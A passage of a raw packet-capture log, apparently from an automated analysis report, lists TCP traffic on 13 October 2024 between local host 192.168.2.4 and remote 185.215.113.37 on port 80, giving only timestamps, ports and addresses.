Oct 13, 2024 17:46:17.649596930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.649607897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.649643898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.649643898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.649666071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.649676085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.649687052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.649696112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.649704933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.649713993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.649724007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.649734974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.649744987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.649745941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.649763107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.649775028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.649779081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.649785042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.649785995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.649836063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.649836063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.649852991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.649863958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.649882078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.649893999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.649904013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.649915934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.649918079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.649918079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.649960995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.649960995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.650018930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650031090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650042057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650054932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650067091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650069952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.650078058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650090933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650115967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.650115967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.650177002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650187969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650197983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650208950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650217056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.650217056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.650226116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650238037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650247097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650257111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650269032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650269985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.650269985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.650279999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650290966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650304079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650307894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.650307894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.650321960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650336981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650347948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650355101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.650357962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650371075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650386095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.650386095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.650455952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650465965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650475025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650485992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650496006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650497913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.650497913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.650527000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650537968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650547981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650558949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650563002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.650563002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.650593042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.650676966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650698900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650739908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.650769949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.650773048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650784969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650795937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650808096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650818110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.650847912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.650847912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.650860071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.738703012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.738723993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.738742113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.738753080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.738764048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.738774061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.738785982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.738795996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.738825083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.738833904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.738846064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.738857031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.738868952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.738948107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.738959074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739025116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739025116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739025116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739126921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739146948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739156961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739171028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739171028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739187002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739264965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739274979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739285946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739290953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739300013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739325047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739326000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739326000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739345074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739356041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739362955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739372969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739392042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739402056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739404917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739404917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739413977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739423990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739434004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739449024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739449024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739451885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739464045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739473104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739478111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739485025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739496946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739507914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739531994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739532948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739532948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739542961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739566088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739576101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739583015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739583969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739587069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739610910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739619970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739630938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739636898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739636898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739640951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739656925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739680052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739690065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739695072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739695072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739752054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739763021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739772081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739774942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739787102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739787102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739799023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739842892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739842892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739876032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739887953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739897966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739909887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739913940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739921093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739954948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739963055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739963055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.739965916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.739998102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.740012884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.740017891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.740017891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.740050077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.740050077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.740071058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.740163088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.740176916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.740189075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.740200043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.740209103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:17.740233898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.740233898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.740319967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.784257889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:17.789478064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005364895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005378008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005388975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005412102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005423069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005434990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005445004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005469084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005479097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005490065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005500078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005511045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005513906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.005551100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005562067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005575895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005599022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.005599022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.005646944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005657911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005669117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005682945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.005682945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.005774021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005784035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005794048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005806923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.005806923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.005810976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005824089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005834103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005856991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005863905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.005863905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.005870104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005882025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005897999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005908966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005916119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.005916119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.005918980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005932093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005959988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.005959988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.005971909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005983114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.005992889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006001949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006001949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006010056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006021023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006031036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006042004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006046057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006046057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006130934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006141901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006151915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006161928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006162882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006161928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006175995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006186962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006197929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006217957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006217957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006253004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006335974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006386042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006397009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006419897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006419897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006442070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006522894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006541967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006551981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006561995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006561995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006575108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006584883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006592989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006592989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006601095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006618023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006628036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006637096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006647110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006649971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006649971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006673098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006683111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006694078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006704092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006707907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006707907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006722927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006732941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006742954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006753922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006764889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006764889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006764889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006774902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006787062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006797075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006798029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006798029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006825924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006835938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006845951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006855011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006855011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006901026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006911993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006922007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006938934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006939888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006939888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006952047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006963015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.006983042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.006983042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007009029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007016897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007081985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007137060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007147074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007165909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007169962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.007181883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007193089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.007208109 CEST	49730	80	192.168.2.4	185.215.113.37
